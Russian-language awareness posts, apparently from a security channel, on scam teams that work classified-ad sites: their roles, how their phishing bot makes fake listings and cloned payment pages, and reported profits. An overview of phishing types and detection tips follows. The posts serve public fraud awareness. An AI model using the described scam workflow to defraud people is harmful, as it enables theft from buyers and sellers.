Как мы уже сказали, аналогичные схемы существуют и для других площадок: OLX, Куфар, Юла и многих других. Для примера ниже приведен скриншот с площадки Юла:

В будущем, мы подготовим статьи про способы мошенничества на сервисах аренды гостиниц и авто.

Будьте внимательны, ведь личная безопасность каждого находится в первую очередь в его руках. Подписывайтесь на канал и узнавайте, как обезопасить себя от мошенников.

Дисклеймер. Все материалы представлены исключительно в ознакомительных целях, авторы ни в коем случае не призывают заниматься мошенничеством и всячески его порицают.

Для начала разберем структуру команды скаммеров:

1. ТС - создатель команды, или один из создателей. Человек, который вложил свои средства в разработку программной части проекта. Специальные боты, домены, хостинги, выделенные серверы, сайты, закуп или же создание мерчей;
2. Технари – люди, которые непосредственно разрабатывают, и поддерживают все это в исправном состоянии;
3. Модераторы - как правило, тоже скаммеры, доверенные лица ТС для контроля событий в чате;
4. Воркеры – люди которые приходят в команду в качестве «работников» для получения прибыли;

В некоторых командах, присутствуют саппорты, если это касается скам проектов, в которых обман происходит посредством сайтов-обменников и т.д. для примера видим одну из таких команд ниже:

Направлений в данной сфере крайне много, ограничиваются они исключительно фантазией и умением человека. На данный момент, активно работают по направлением бордов предоставления услуг продажи/работы: Авито, Юла, Боксберри, ОЛХ, Куфар, Blablacar и т.д.

Принципы работы

Для примера возьмем функционал одного из ботов и рассмотрим его поближе.

Выберем страну, например, Республику Беларусь.

Наблюдаем подобный функционал, разницу в «версиях» рассмотрим в следующей статье.

Выберем Куфар 2.0, и зайдя на сайт выбираем случайную публикацию. Одна из самых распространенной категорий скама – смартфоны iPhone.

Вот ее содержание:

Далее проходит некоторое подобие заполнения «анкеты» скам-товара:

Ссылки не замазаны специально, дабы на основе прошлой статьи вы могли наглядно увидеть, что эти ссылки – фишинговые, и не ведут на стандартные страницы проведения платежа. Переходим по ссылке и видим в точности скопированный дизайн, однако данные те, которые мы ввели:

После этого в боте мы увидим это:

Ради интереса пишем в «поддержку» на сайте, протестить функционал, и отвечаем в боте:

Функционал впечатляет, не правда ли? А ведь это только вершина айсберга. Впрочем, подробнее про методы мошенничества мы поговорим в следующей статье. А сейчас рассмотрим то, сколько же денег теряют доверчивые люди.

Масштабы бедствия

Для примера, возьмем все ту же Республику Беларусь

Рассматриваемая нами команда появилась около года назад, однако уже сейчас ее ТОП воркеров по прибыли по одной только РБ впечатляет, не правда ли? Особенно если перевести в рубли и получить профит первого места 2 208 296 рублей. А только 10 человек, которые сидят в топе, суммарно получили 11 449 116 рублей. Одиннадцать миллионов рублей, только по Республике Беларусь.

Если думаете, что в России объемы меньше, то вы ошибаетесь:

Подробнее статью из скриншота выше вы можете прочитать по ссылке.

Ниже будут скриншот из этой же команды по некоторым странам ЕС. Это можно будет заметить из стилистики сообщения Id (внутри самой команды, который выдает бот):

На данном скриншоте мы видим прибыль всего лишь топа воркеров по данным странам. Профит по Польше: 32 106 399 рублей и по Португалии: 11 197 334 рубля.

Итак, оценив масштабы процветания скам-проектов, вы наверняка задались вопросом, как же не попасться на уловки мошенников и сохранить свои средства. Об этом мы расскажем в следующей статье, посвященной классическим схемам мошенников.

Подписывайтесь на наш канал, чтобы не стать жертвой злоумышленников. Помните, предупрежден - значит вооружен.

Фишинговые мошенники не пытаются воспользоваться техническими уязвимостями в операционной системе устройства, они прибегают к методам так называемой социальной инженерии. От Windows и Android до Mac и iPhone, – ни одна операционная система не обладает полной защитой от фишинга, какими бы мощными ни были ее антивирусные средства. В действительности злоумышленники часто прибегают к фишингу, потому что не могут найти какие-либо технические уязвимости. Зачем тратить время на взлом многоуровневой защиты, когда можно обманным путем заставить пользователя добровольно раскрыть свои данные?

В большинстве случаев самым слабым звеном в защите системы является не ошибки в коде, а сам пользователь, который не соблюдает элементарных правил безопасности.

На данный момент, существует несколько типов фишинга.

Адресный фишинг.

Вид фишинга который подразумевает атаку на конкретного пользователя или организацию. В данном случае мошенники часто применяют специально подобранный контент, который, как им представляется, окажет на жертву наибольшее воздействие. Для осуществления подобной атаки необходимо провести тщательную подготовку, чтобы узнать имена, должности, адреса электронной почты и другую сопутствующую информацию. Злоумышленники переворачивают вверх дном весь Интернет, сопоставляя эту информацию со всеми доступными сведениями о должностных отношениях жертвы: например, их интересуют имена коллег и круг их обязанностей в соответствующей организации. Заполучив все эти данные, злоумышленники составляют правдоподобное письмо.

Для примера, подобная атака может производиться на сотрудника бухгалтерии, который отвечает за денежные операции предприятия, когда ему пишут запрос от якобы вышестоящего руководства о переводе средств на такие-то реквизиты, или на специалистов технической поддержки бухгалтерского софта, отправляя им письмо с просьбой установить апдейт и прикрепленным файлом.

Производя переход по ссылке – сотрудник может ввести личные данные авторизации, или же дать разрешения сайту, тем самым позволив ему выполнить вредоносные сценарии.

Устанавливая файл из подобного письма сотрудник сам заражает свою систему. Все логично, и просто, однако, этот метод редко применяется на обычных людей, так сказать, на широкую публику.

В основном, это угроза для бизнеса, и даже целого государства. К примеру, в США средняя величина ущерба от фишинга около 1.5 млн. долларов на одну успешную атаку.

Клоновый фишинг.

Данный вид фишинга ориентируется на работу с массами, заменой привычных нам электронных писем от соцсетей и их рассылкой. Зачастую выгодно заразить один ПК и, получив доступ к почте, раскинуть спам по адресатам уже от имени доверенного пользователя. Данный вид фишинга более распространен и нацелен на общий объем получаемых данных, нежели потенциальную прибыль от одного пострадавшего.

Телефонный фишинг.

По факту, это обычные звонки от «сотрудников банка» с которыми наверняка сталкивалось большинство. Очевидно, что данным методом у нас будут пытаться узнать данные карт и банковских аккаунтов, прикрывая это заботой о сохранности наших финансов.

Нигерийский фишинг.

Да, несколько экзотическое название, но такое название имеет так как метод достаточно дубовый, и нацелен на совсем наивных людей, которые верят в счастье, упавшее сверху.

Данный вид фишинга напоминает старую рекламу «Invite - просто добавь воды». Выглядит вкусно, а по факту вреда больше, чем чего-либо другого. Он заключается в убеждении человека, что тот получил вознаграждение за помощь в переводе\хранении денег из-за границы у себя на счету, а для получения этого вознаграждения всего-то нужно отправить данные своего банковского счета. Письмо будет, к примеру, от какого-то нигерийского принца или госслужащего. Выглядит до неприличия странно, но есть те, кто ведется.

Защита от фишинга

Раз мы узнали, какие виды фишинга могут встретиться, пора познакомиться и с методами их распознания. Вот основные признаки фишингово письма:

1. Информация выглядит подозрительно, пытается давить на страх, или создать тревожную атмосферу, к примеру информация про блокировку банковского счета, непредвиденные транзакции, или же письмо от близкого человека, который почти никогда с вами не общался подобным образом. Чем больше вы встревожены, тем вас легче подсадить на крючок.
2. Письмо на почте содержит вложение, или ссылки. Если приходится часто иметь с этим дело – привыкайте проверять адреса ссылок, на правильность введенных букв доменного именного имени и доменной зоны. К примеру, если письмо от Facebook, то ссылка должна быть https://facebook.com но не в коем случае https://facebok.com или  https://facebok.com.ru и т.д.
3. В письме используются гиперссылки. Для их проверки просто наведите на них курсор, и внизу экрана мы увидим ссылку, на которую она ведет. Для примера, скриншот из интернета:

На этом скриншоте видно письмо от PayPal с просьбой подтвердить наличие доступа к аккаунту. При наведении на кнопку «Confirm now» внизу слева (обведено красным контуром) видим ссылку, на которую нас перекинет при нажатии. И вместо привычного https://paypal.com мы наблюдаем https://m y sp [.] ac.

В ссылке специально вставлены пробелы, чтобы обезопасить вас от случайного нажатия. Ни в коем случае не переходите по этой ссылке!

Таким образом можно проверить любую гиперссылку.

Если вы не используете антивирус для своего устройства, установите хотя бы решение Internet Security от любого понравившегося производителя ПО. Большинство фишинговых сайтов будут отсечены при попытке перехода на них.

Помните, самая большая угроза для системы всегда находится перед монитором. Подписывайтесь на канал, вас ждет еще много полезного материала.